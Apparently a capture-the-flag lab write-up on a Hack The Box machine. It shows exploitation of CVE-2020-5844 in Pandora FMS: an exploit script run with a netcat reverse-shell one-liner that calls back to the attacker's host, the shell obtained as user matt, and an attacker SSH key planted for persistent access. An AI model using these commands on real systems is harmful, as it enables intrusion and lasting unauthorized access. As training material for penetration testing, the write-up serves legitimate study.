InfoSec LAB

Pandora_Lateral_Movement_matt_2

Created: 4 min read

CVE-2020-5844

a vulnerability was found in pandora fms 7.0 ng. It has been declared as critical. Affected by this vulnerability is an unknown function of the file index.php?sec=godmode/extensions&sec2=extensions/files_repo. The manipulation with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434. The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product’s environment. As an impact it is known to affect confidentiality, integrity, and availability.

Exploit

Exploit is available online

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ python3 CVE-2020-5844.py -t 127.0.0.1 8008 -p nh2mou87br8ntaitmofvnur5db -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.2 8888 >/tmp/f'
 
        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
unicord: Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
options: Command Shell Mode
phpsess: nh2mou87br8ntaitmofvnur5db
command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.2 8888 >/tmp/f
website: http://127.0.0.1:8008/pandora_console
exploit: Connected to website! Status Code: 200
exploit: Logged into Pandora FMS!

launching the exploit. the -p flag supplies the session cookie retrieved from exploiting [[pandora_cve-2021-32099#cve-2021-32099|CVE-2021-32099]]

┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.136] 33750
bash: cannot set terminal process group (847): Inappropriate ioctl for device
bash: no job control in this shell
matt@pandora:/var/www/pandora/pandora_console/images$ whoami
whoami
matt
matt@pandora:/var/www/pandora/pandora_console/images$ hostname
hostname
pandora
matt@pandora:/var/www/pandora/pandora_console/images$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.136  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:364  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:364  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:64  txqueuelen 1000  (Ethernet)
        RX packets 1168910  bytes 179502193 (179.5 MB)
        RX errors 0  dropped 20  overruns 0  frame 0
        TX packets 1242649  bytes 1011657927 (1.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 35018  bytes 9480153 (9.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 35018  bytes 9480153 (9.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lateral movement made to the matt user via exploiting [[#cve-2020-5844|CVE-2020-5844]]

SSH

matt@pandora:/var/www/pandora/pandora_console/images$ mkdir -p ~/.ssh ; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' > ~/.ssh/authorized_keys
 
┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ ssh matt@$IP          
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Thu 20 Apr 12:40:54 UTC 2023
 
  System load:           0.0
  Usage of /:            65.5% of 4.87GB
  Memory usage:          19%
  Swap usage:            0%
  Processes:             246
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.136
  IPv6 address for eth0: dead:beef::250:56ff:feb9:364
 
  => /boot is using 91.8% of 219MB
 
 
0 updates can be applied immediately.
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
matt@pandora:~$ whoami
matt
matt@pandora:~$ hostname
pandora
matt@pandora:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.136  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:364  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:364  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:64  txqueuelen 1000  (Ethernet)
        RX packets 1169668  bytes 179646506 (179.6 MB)
        RX errors 0  dropped 20  overruns 0  frame 0
        TX packets 1243304  bytes 1011761119 (1.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 36802  bytes 9708938 (9.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 36802  bytes 9708938 (9.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Interactive Graph View

Backlinks